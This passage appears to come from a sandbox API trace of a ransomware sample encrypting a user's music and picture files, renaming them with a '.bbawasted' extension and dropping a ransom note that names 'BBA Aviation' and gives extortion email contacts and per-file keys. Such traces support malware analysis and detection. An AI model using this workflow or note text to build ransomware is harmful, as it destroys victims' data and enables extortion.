"c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\r4 59aox93svl cssc.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0223.325] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.326] SetEndOfFile (hFile=0x290) returned 1 [0223.326] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.326] lstrcpyW (in: lpString1=0x6c4c04, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\R4 59aOX93svl csSC.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\r4 59aox93svl cssc.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\R4 59aOX93svl csSC.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\r4 59aox93svl cssc.wav.bbawasted")) returned 1 [0223.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\R4 59aOX93svl csSC.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\r4 59aox93svl cssc.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0223.329] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0223.330] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1517f [0223.330] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1517f) returned 0x5f0000 [0223.330] CloseHandle (hObject=0x288) returned 1 [0223.334] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0223.335] CloseHandle (hObject=0x27c) returned 1 [0223.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0223.335] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f98) returned 1 [0223.336] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0223.336] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0223.336] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0223.337] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0223.337] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0223.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0223.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.348] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OwMReUpCv8NppoPZr2fEgx5OZtW4XeU4myaD+3pwZbbpydGSnkXHA2GhjzH8kjGK\r\nqfpqZwVdFXezEpvo7gGqK9OJDUr2kKTsqOTojA2dlIT5EXmEu+5ff4EBetL4y2Dk\r\nDXj49YKT9FmUFnvnGNSVyRexGrcbxTsyFEH9rzbFWeiTUjmCL54HXc55O/ZuCKv1\r\nIl2CMX4RjOMtHlDRH3lnAG9VeVfzaZxypwO/3CNyfhYHFtsO3y4rIH+s9aiRGZwc\r\nJQLJfz2Jj4Qu/7IQZlh6Fu1PzzEd8c4wZa3s7eA/tj0uDXQOproCxegrJsU8Jkux\r\nd40cPg+/+/QdAy9oBNtGmM7xzFH68ZmK8a/wCCnxKYhc7m3VenmURpf9bXYstn2a\r\n2TFlPHe1tYJZSgYTSPQzYpGiIBRtkt2en7ESvV2W66X1s1Cn5FqQmdraFqEtF8Mc\r\nLsLbD9XQ04HhDEcRr94NIE5kgsDNrM9PNnjpMS8KqIinWYC36bbcsiQ82bqovQ2k\r\nHsGw4xmYabZ/jZuAMftdDJ21ZZpkD+B4aMYGnwDt/mZM1ZgTJR21xQ0/baifQdLq\r\n8Bm16LLKeMzdaoZTjLNmf6mw0oxp//OgJnhik5mMVkBxRz2kohfqyNyzaCRI9x7m\r\nFtf3UZobW7B+nTmklx1W14zI4GI91B5Zob9RHoEVSnE=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0223.348] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0223.349] SetEndOfFile (hFile=0x290) returned 1 [0223.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.351] CloseHandle (hObject=0x290) returned 1 [0223.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0223.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a89f8 | out: hHeap=0x660000) returned 1 [0223.352] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0223.352] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0223.353] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0223.353] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\gbGJZp3Ca E-qGo.mp3") returned 45 [0223.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6adb18 [0223.353] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.353] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6020) returned 1 [0223.353] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.353] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0223.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\gbGJZp3Ca E-qGo.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\gbgjzp3ca e-qgo.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0223.354] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.356] SetEndOfFile (hFile=0x290) returned 1 [0223.356] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.356] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\gbGJZp3Ca E-qGo.mp3" (normalized: "c:\\users\\fd1hvy\\music\\gbgjzp3ca e-qgo.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\gbGJZp3Ca E-qGo.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\gbgjzp3ca e-qgo.mp3.bbawasted")) returned 1 [0223.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\gbGJZp3Ca E-qGo.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\gbgjzp3ca e-qgo.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0223.562] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0223.563] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xbc7b [0223.563] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbc7b) returned 0x5f0000 [0224.015] CloseHandle (hObject=0x27c) returned 1 [0224.019] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.019] CloseHandle (hObject=0x280) returned 1 [0224.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0224.020] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0224.020] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0224.020] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0224.020] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6ce0) returned 1 [0224.021] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0224.021] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0224.032] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0224.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0224.032] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0224.032] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AdeIiuLj60Y0s3K8KT8CxxrMWCpiLPgVYBoFCIAA+HTH7i1kCAjLo2PrmAeS4omW\r\n5cUNzjmNM14Jw20DBddfLghkwBecuFk/gvDT07WgieBCeubG+WdX6gvRHwIyF/BZ\r\nH7+h6htmWAdnUXFqLtkh0UQlD5cfwrFHwFRWGyNFpCaSV1Yxt16/XEhtc1BXauKt\r\no3R+WusamWv2iwG8+suAcf3hMYKIvA5EdQlN1tHkrhQPD+KipL95xrBNyMUXMzir\r\nW2skfwgYGg4m3c87A0UBXEbETsWjYiDADoELAwp9vSs9HS9oAXjhS1qtpkaz1o0h\r\n+tgSjckKGULJqrwF/8i37S9M/7nbWGbYRMl6uzRJbqKq/aL+3VPl3xg1I0ELQzVG\r\njiAH+QKH7n+IUKHROf1HYYJgILrKJd6k66sQR52NX7GcIIim/dYgEohbacDwdG0a\r\noag+wZwE36uFlR1y0aVwG3xsry79h7aVSXT+oRJXluq8n/OlT/MbquVZnWyxOHHs\r\nGzIb6IgadnEKTjNJh5rdxCBwG3vL3CyAvDbcd/cxEQIBCkMk+18oQgBDQvbFlsa3\r\nzu8dNCdHp8a0HA7/1sz+loXXIrmdhdRVaVN1aeWp5iuSLzJMc484wDTrlk9Mvk9l\r\n/9ei1jXg8ptOzbPxFIZ9OjO2jYxoRdlajw4vnuZS2D5=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0224.032] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0224.033] SetEndOfFile (hFile=0x290) returned 1 [0224.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0224.036] CloseHandle (hObject=0x290) returned 1 [0224.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0224.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af198 | out: hHeap=0x660000) returned 1 [0224.036] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0224.037] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0224.037] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0224.037] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\2qob_hUX37atJ8sBYtE2.bmp") returned 53 [0224.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0224.037] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0224.037] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0224.038] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0224.038] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0224.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\2qob_hUX37atJ8sBYtE2.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\2qob_hux37atj8sbyte2.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0224.039] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.041] SetEndOfFile (hFile=0x290) returned 1 [0224.041] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0224.041] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\2qob_hUX37atJ8sBYtE2.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\2qob_hux37atj8sbyte2.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\2qob_hUX37atJ8sBYtE2.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\2qob_hux37atj8sbyte2.bmp.bbawasted")) returned 1 [0224.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\2qob_hUX37atJ8sBYtE2.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\2qob_hux37atj8sbyte2.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0224.042] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0224.043] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5453 [0224.043] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5453) returned 0x5f0000 [0224.043] CloseHandle (hObject=0x280) returned 1 [0224.044] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.044] CloseHandle (hObject=0x27c) returned 1 [0224.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0224.045] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0224.045] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0224.045] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0224.045] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0224.312] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0224.312] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0224.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0224.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0224.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.322] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YHubk4C/PCvShnzY5YT21j5LRI19NbxMvF4e6Hk9CpS/7fvEnoeQYs0t9nV4RC/W\r\noXGbLMgZ+WsZjTVLjSw5oxQAdvjyQwGzN4bSfd3uevN1C6Rrng6Ym15ttw65BrS/\r\nZrAF+ELkx21rSwKux/croNn0GACloN3MOlYeDC1x1Lb7mpl3tf2qGkEwedWg0UcQ\r\nHSmX8pD8WkAfSaw3U0h8MoQVCONKQ0KGVMY2WEMMIiSVgwLW7/Tgb6vJebPqnObH\r\n6iwf7w380jAvbrKRBgAD62Ghm8lIVGQDQjP2nLSBMlG3FcqnY7fqoIBy4SCUlOXS\r\nQMur6aTZe5sfcWLl3yhudQ3uOs3WCSx9TPfD7fcJqmHuPv9Vas5uiXgxh7c6R1hD\r\nMUtzC1b7KD2r0oXWFLZ6hu8HuSOOOB9HcV/uB+xgY255vDCq8qOmSBzQheyxRVAx\r\nnppuNjR2PNb4K7NlOVXqQ5wYH1/y4gHGMp/vMys++n3wY6ZpmPjQgU53AroQUXmS\r\n4E+4D55p/XciuSPEivYVmtPMPF1njpmohIGZf3kbKacKPb52FNObXDDSN7usqq+t\r\ncENC+cbANKHT5Jp715yIDjIFOYp0AIlt7YS3M0kmtFFHH/asSCe5+f3Pu8Pav2uI\r\niddPuP0Pr0ZlbPIjqT18wnupjlzsG9xvJrbEKhxsvrJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0224.322] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0224.322] SetEndOfFile (hFile=0x290) returned 1 [0224.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.325] CloseHandle (hObject=0x290) returned 1 [0224.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0224.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b81c0 | out: hHeap=0x660000) returned 1 [0224.325] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f10) returned 1 [0224.326] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0224.326] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0224.326] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\C7M_PgbabO.jpg") returned 49 [0224.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a21e0 [0224.326] lstrcpyW (in: lpString1=0x6a2242, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.326] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6ce0) returned 1 [0224.327] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.327] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0224.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\C7M_PgbabO.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\c7m_pgbabo.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0224.328] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.329] SetEndOfFile (hFile=0x290) returned 1 [0224.329] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.329] lstrcpyW (in: lpString1=0x6a2242, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\C7M_PgbabO.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\c7m_pgbabo.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\C7M_PgbabO.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\c7m_pgbabo.jpg.bbawasted")) returned 1 [0224.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\C7M_PgbabO.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\c7m_pgbabo.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0224.330] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0224.331] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x68d0 [0224.331] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x68d0) returned 0x610000 [0224.331] CloseHandle (hObject=0x27c) returned 1 [0224.332] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0224.333] CloseHandle (hObject=0x280) returned 1 [0224.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 